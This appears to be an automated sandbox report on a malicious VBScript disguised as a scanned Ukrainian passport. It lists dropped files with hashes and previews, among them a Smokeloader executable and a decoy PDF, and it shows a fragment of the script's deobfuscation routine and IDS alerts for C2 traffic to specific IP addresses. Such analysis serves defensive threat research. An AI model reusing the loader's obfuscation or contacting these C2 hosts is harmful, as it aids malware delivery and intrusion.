                                                                                                SHA-256:61A7CB99932E26BC601C6B0AE8858D85FDBB8F9F06CD2B167F6B3365CF7F409F
                                                                                                SHA-512:32F48E6E4600D7A01533B6BA423ED6C3E12E5E5C6324DF52D8F5D22A19601DF14645183E45C21BEF66E2D298FA03A5962BF1434B8CF69EFF549E283F6AAB05AF
                                                                                                Malicious:false
                                                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlllulzh8//h:NllUu
                                                                                                MD5:2D936C9957097D6631C64386010C648E
                                                                                                SHA1:AD0125A442F7BD53E9959CB996B58A685B09B85E
                                                                                                SHA-256:C93CB35DFCB4C1F5BD3B665C67D749E585887E56B9081D0E9FC47F54909E7119
                                                                                                SHA-512:27B07DBB385D27EF522ED09079877C6EBE9444FBE1E4401AF8BABB4B2EE4FC1CF7BC1A09B31A3A52ACA217B40E2B8207A5441D04F1C6D9A44C05E51C4D49E4AB
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):246
                                                                                                Entropy (8bit):3.513199765407527
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDgPwlYH:Qw946cPbiOxDlbYnuRKSE4lYH
                                                                                                MD5:F8C2583FC1428B434842246D0D778C55
                                                                                                SHA1:1CA1A27398118D26F148FF75F2576E91E38F7096
                                                                                                SHA-256:362E70AD1E1A77B50A9E214E928BBCD0DF18D073EBE4141B52B77BCBC531D2FC
                                                                                                SHA-512:0FFBCC9228A3EB105C630BEE8E1F17F0F4E22E0BF819EB9AC4F4CF9E083877CC7FB3B9BD59B58E28C66D442F5A42AA4FF5626BF8199CC249C8D34D266DFE5267
                                                                                                Malicious:false
                                                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .0.3.:.2.3.:.3.0. .=.=.=.....
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393)
                                                                                                Category:dropped
                                                                                                Size (bytes):16525
                                                                                                Entropy (8bit):5.376360055978702
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                Malicious:false
                                                                                                Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15114
                                                                                                Entropy (8bit):5.382980657724517
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:NFvUX5yPNsdDHE7IsK1k5/3rvcJ7sx9HZK2y8ocIv76/pBvf1YOZdkdFE2MsGTDl:95IL2
                                                                                                MD5:DE7A2FFEDC801F356BD7C800E3E87CED
                                                                                                SHA1:08098CFE18ADF52D1110D479446D72CE5F668799
                                                                                                SHA-256:50AF269A2127F222BBBD63326578942C74B6FB5F9D2A5FDE3B7EAE5CD1C19CC3
                                                                                                SHA-512:C4F91ABC178C66130E49F58F489A5D6297E486BEEF2B36EA76EC10DA7BA59B6E718C70BCC33C169E2B043A21E4B7D3C40C74AA1F8060B69506409DE9C2568D4E
                                                                                                Malicious:false
                                                                                                Preview:SessionID=91e3b9fb-0e19-4765-86fa-bddf75dac4bc.1734510204588 Timestamp=2024-12-18T03:23:24:588-0500 ThreadID=7500 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=91e3b9fb-0e19-4765-86fa-bddf75dac4bc.1734510204588 Timestamp=2024-12-18T03:23:24:589-0500 ThreadID=7500 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=91e3b9fb-0e19-4765-86fa-bddf75dac4bc.1734510204588 Timestamp=2024-12-18T03:23:24:589-0500 ThreadID=7500 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=91e3b9fb-0e19-4765-86fa-bddf75dac4bc.1734510204588 Timestamp=2024-12-18T03:23:24:589-0500 ThreadID=7500 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=91e3b9fb-0e19-4765-86fa-bddf75dac4bc.1734510204588 Timestamp=2024-12-18T03:23:24:589-0500 ThreadID=7500 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):29752
                                                                                                Entropy (8bit):5.397297922536344
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb5:F
                                                                                                MD5:41E14AD1B6B3ECFC8B963CAF9BF6609A
                                                                                                SHA1:9E8C6292AC22673519380079A275208E2F794004
                                                                                                SHA-256:D6DEC43BEB03892E3B9B5CB250770C54FE24B1CCF3E1F5CE4F714D3D23FB7362
                                                                                                SHA-512:774838CF2BD4E4FE0A574495CAB5A0E457F9C19CCC173B1A9B7C9865E2A9965F16681BD3E925EFECB359CD5DF1EBB254A142BD7052CD63255A2943225D04336F
                                                                                                Malicious:false
                                                                                                Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                Category:dropped
                                                                                                Size (bytes):1419751
                                                                                                Entropy (8bit):7.976496077007677
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                                MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                                SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                                SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                                SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                Category:dropped
                                                                                                Size (bytes):386528
                                                                                                Entropy (8bit):7.9736851559892425
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                Malicious:false
                                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                Category:dropped
                                                                                                Size (bytes):1407294
                                                                                                Entropy (8bit):7.97605879016224
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                Category:dropped
                                                                                                Size (bytes):758601
                                                                                                Entropy (8bit):7.98639316555857
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                Malicious:false
                                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):331264
                                                                                                Entropy (8bit):7.31794844202294
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:xwOCfMLyi6hxoZ60dMEAaWC++mpFphvhusianDqFirYZFBkMB:xwFfM2i6hCA0WEB+f3hvjianSZFt
                                                                                                MD5:C09AA26230A2083DA9032866FD33703D
                                                                                                SHA1:2D1706C9D1BDCA15650A2AF93A7CD2B6D0D41780
                                                                                                SHA-256:7A70F2C8E40FE861DB51E119D589C7C5D036581D7F46474B364B1280ED8A540B
                                                                                                SHA-512:C3308BF60214A7EE9B9C2C65FA4D9DDF50A207CD90E67E5AC1BE03F08AE28D0302AC58FF882D3964C9991069197BF0ACAC6DB43DDFCA0AF34573B463DBF725EE
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.js, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...x.$.|...x.5.T...x.2...A~.e...f.....x.;.g...x.%.g...x. .g...Richf...................PE..L....\.d.................l.......................@.................................#....................................... p..(....@...9...........................................................8..@............................................text....j.......l.................. ..`.data...........d...p..............@....rsrc....9...@...:..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):502098
                                                                                                Entropy (8bit):7.948566774928097
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:BqdCpfe17gMwFi27if1t/DagCmjZoPMgN9MWMnM+ewI1Oc:aaEkw31lWgC2JfnZo
                                                                                                MD5:7D00681617FC8D133569057AACC31527
                                                                                                SHA1:CEEEAED8668475DD09EF2537307A7795DAAB1191
                                                                                                SHA-256:E0C57518AEEF787BCF7CC13484486CFA48458BDF6B0BAEE02598E777A3EF83F2
                                                                                                SHA-512:729FBDB651A92B42257B1CA0DCB36E82219EA58E9374612C5ACC3E795A24177656FCE19C6E310E903EDC17AB2A062750B39A07639D922B2568DBBAA24BBAC0FF
                                                                                                Malicious:false
                                                                                                Preview:0...M..*.H..........=0...8...1.0...*.$.......0...B..*.H..........2....-%PDF-1.7.%.....1 0 obj.<</ColorSpace/DeviceRGB/Subtype/Image/Height 840/Filter/DCTDecode/Type/XObject/Width 750/BitsPerComponent 8/Length 164491>>stream.......JFIF.....H.H.....8Photoshop 3.0.8BIM........8BIM.%..................B~......H...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................................................................C....................................................................C....................................................................../............?..d.].<.Fs.o_.....I.s..7.$......sOR.nc.=q...vJj..*.....qR.......TI DR.,..r9.....g.r..
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):331264
                                                                                                Entropy (8bit):7.31794844202294
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:xwOCfMLyi6hxoZ60dMEAaWC++mpFphvhusianDqFirYZFBkMB:xwFfM2i6hCA0WEB+f3hvjianSZFt
                                                                                                MD5:C09AA26230A2083DA9032866FD33703D
                                                                                                SHA1:2D1706C9D1BDCA15650A2AF93A7CD2B6D0D41780
                                                                                                SHA-256:7A70F2C8E40FE861DB51E119D589C7C5D036581D7F46474B364B1280ED8A540B
                                                                                                SHA-512:C3308BF60214A7EE9B9C2C65FA4D9DDF50A207CD90E67E5AC1BE03F08AE28D0302AC58FF882D3964C9991069197BF0ACAC6DB43DDFCA0AF34573B463DBF725EE
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.js, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...x.$.|...x.5.T...x.2...A~.e...f.....x.;.g...x.%.g...x. .g...Richf...................PE..L....\.d.................l.......................@.................................#....................................... p..(....@...9...........................................................8..@............................................text....j.......l.................. ..`.data...........d...p..............@....rsrc....9...@...:..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                File type:ASCII text, with very long lines (8491), with CRLF line terminators
                                                                                                Entropy (8bit):3.4713024779606356
                                                                                                TrID:
                                                                                                • Visual Basic Script (13500/0) 100.00%
                                                                                                File name:#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
                                                                                                File size:9'177 bytes
                                                                                                MD5:e6cba366210db05b0c86115900a17133
                                                                                                SHA1:f3cc53aa5b7a037a8027d8d1703ab5c367687237
                                                                                                SHA256:dada50182ca98f75e0055f9b4a47d8ef3a6dda5c126cac309467c02257f3c1c0
                                                                                                SHA512:1efe2ae4ba34db3c9fd1c95fe6265932b423663e01d1f39c3eb2d9458ff858f0b9044648f5060a1ba98c8f60e75a016f62116dc91aaf6558d5f346ae8ad24253
                                                                                                SSDEEP:96:kUHo9ElT7jssM1XvRYQ1i8xctyP7PHeLpE/OafJPXX5cjY2QFR43jnjbME6J:kU0E9sNOz8SIB/OafNXXbRuj4E6J
                                                                                                TLSH:7F12A62A28B449BBCBAE3931914BE84D95FC9AD237ECF7103603C95CD537065D8D5A0B
                                                                                                File Content Preview:Function ItIDtGG(ByVal XAog).. Dim EYPleL.. Dim ESHZ.. ESHZ = 302.. Dim sIpJ.. sIpJ = LXkZQzr(XAog).. If sIpJ = 7000 + 1204 Then.. For Each EYPleL In XAog.. Dim ZLfIU.. ZLfIU = ZLfIU & Chr(EYPleL - ESHZ).. Next.. End
                                                                                                Icon Hash:68d69b8f86ab9a86
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-12-18T09:23:10.221075+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549968109.70.26.3780TCP
                                                                                                2024-12-18T09:23:22.147886+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54970494.156.177.5180TCP
                                                                                                2024-12-18T09:23:53.418120+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54976694.156.177.5180TCP
                                                                                                2024-12-18T09:23:53.418120+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54976694.156.177.5180TCP
                                                                                                2024-12-18T09:23:55.402515+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54977294.156.177.5180TCP
                                                                                                2024-12-18T09:23:57.246237+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549778109.70.26.3780TCP
                                                                                                2024-12-18T09:25:03.621337+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54993094.156.177.5180TCP
                                                                                                2024-12-18T09:25:03.621337+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.54993094.156.177.5180TCP
                                                                                                2024-12-18T09:25:05.246394+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54993694.156.177.5180TCP
                                                                                                2024-12-18T09:25:06.730879+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549938109.70.26.3780TCP
                                                                                                2024-12-18T09:25:08.804225+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54994494.156.177.5180TCP
